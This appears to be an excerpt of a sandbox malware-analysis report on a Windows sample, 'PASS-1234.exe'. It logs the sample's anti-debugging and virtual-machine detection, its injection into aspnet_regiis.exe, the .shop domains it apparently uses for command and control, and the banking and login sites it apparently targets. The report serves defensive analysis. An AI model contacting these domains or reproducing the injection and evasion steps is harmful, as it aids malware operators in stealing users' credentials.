                Source: C:\Users\user\Desktop\PASS-1234.exeUnpacked PE file: 0.2.PASS-1234.exe.b90000.0.unpack C;FTo:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;
                Source: PASS-1234.exeStatic PE information: section name: C;FTo
                Source: PASS-1234.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00B990AC push edi; retf 0_2_00B990B7
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00B9608B push edi; retf 0_2_00B960EF
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00B960D8 push edi; retf 0_2_00B960EF
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00B971BA push esp; retf 0_2_00B971D6
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00BA1185 push E06F2BF3h; retf 0_2_00BA11A9
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00B9C9D0 pushfd ; retf 0_2_00B9C9CF
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00B961C1 push edx; retf 0_2_00B961EC
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00B9617E push edx; retf 0_2_00B961EC
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00B9C971 pushfd ; retf 0_2_00B9C9CF
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00B96142 push edi; retf 0_2_00B960EF
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00B9221F push ecx; iretd 0_2_00B92220
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00B9820A push edi; retf 0_2_00B98254
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00BA1A7B push edx; retf 0_2_00BA1A85
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00B96260 push edx; retf 0_2_00B961EC
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00B94A5E push edx; retf 0_2_00B94A97
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00BEFD60 push eax; mov dword ptr [esp], A8ABAAFDh0_2_00BEFD62
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00B96EA9 push ds; retf 0_2_00B96EBF
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00BA06AD push ds; retf 0_2_00BA06EB
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00B937ED push esp; retf 0_2_00B937F7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031AC170 push eax; mov dword ptr [esp], 05020300h3_2_031AC17E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031AEE60 push eax; mov dword ptr [esp], A8ABAAFDh3_2_031AEE62
                Source: PASS-1234.exeStatic PE information: section name: C;FTo entropy: 7.999702756897987
                Source: C:\Users\user\Desktop\PASS-1234.exeFile created: C:\Users\user\AppData\Roaming\gdi32.dllJump to dropped file
                Source: C:\Users\user\Desktop\PASS-1234.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: PASS-1234.exe PID: 1916, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeMemory allocated: 15C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeMemory allocated: 2F30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeMemory allocated: 4F30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeMemory allocated: 5590000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeMemory allocated: 6590000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeMemory allocated: 66C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeMemory allocated: 76C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeMemory allocated: 7B90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeMemory allocated: 8B90000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWindow / User API: threadDelayed 3469Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 4396Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 7084Thread sleep count: 3469 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeLast function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_6D393562 FindFirstFileExW,0_2_6D393562
                Source: Amcache.hve.6.drBinary or memory string: VMware
                Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: aspnet_regiis.exe, 00000003.00000003.2738030151.000000000345D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3389826403.0000000003425000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2788081737.000000000341E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3389909907.000000000345D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2700805678.000000000345D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2773711720.000000000345D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2725007769.000000000345D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2783480439.0000000003422000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2773902054.000000000345D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: Amcache.hve.6.drBinary or memory string: vmci.sys
                Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: Amcache.hve.6.drBinary or memory string: VMware20,1
                Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
                Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.6.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
                Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005908000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
                Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: aspnet_regiis.exe, 00000003.00000003.2738030151.000000000345D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3389909907.000000000345D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2700805678.000000000345D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2773711720.000000000345D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2725007769.000000000345D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2773902054.000000000345D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWU
                Source: aspnet_regiis.exe, 00000003.00000003.2741161023.00000000058E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SE1sQemuD
                Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
                Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
                Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: aspnet_regiis.exe, 00000003.00000003.2712362890.0000000005903000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeAPI call chain: ExitProcess graph end nodegraph_3-13672
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_031AD810 LdrInitializeThunk,3_2_031AD810
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_6D39051A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6D39051A
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_6D391CA5 mov eax, dword ptr fs:[00000030h]0_2_6D391CA5
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_6D392E79 mov eax, dword ptr fs:[00000030h]0_2_6D392E79
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_6D394A8C GetProcessHeap,0_2_6D394A8C
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_6D39051A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6D39051A
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_6D392EAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6D392EAA
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_6D390041 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6D390041
                Source: C:\Users\user\Desktop\PASS-1234.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\PASS-1234.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 3170000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 3170000 value starts with: 4D5AJump to behavior
                Source: PASS-1234.exeString found in binary or memory: cloudewahsj.shop
                Source: PASS-1234.exeString found in binary or memory: noisycuttej.shop
                Source: PASS-1234.exeString found in binary or memory: rabidcowse.shop
                Source: PASS-1234.exeString found in binary or memory: framekgirus.shop
                Source: PASS-1234.exeString found in binary or memory: tirepublicerj.shop
                Source: PASS-1234.exeString found in binary or memory: abruptyopsn.shop
                Source: PASS-1234.exeString found in binary or memory: wholersorie.shop
                Source: PASS-1234.exeString found in binary or memory: undesirabkel.click
                Source: PASS-1234.exeString found in binary or memory: nearycrepso.shop
                Source: C:\Users\user\Desktop\PASS-1234.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 3170000Jump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 3171000Jump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 31B2000Jump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 31B5000Jump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 31C3000Jump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 3171000Jump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 31B2000Jump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 31B5000Jump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 31C3000Jump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2E57008Jump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_6D3906E8 cpuid 0_2_6D3906E8
                Source: C:\Users\user\Desktop\PASS-1234.exeQueries volume information: C:\Users\user\Desktop\PASS-1234.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_6D390163 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6D390163
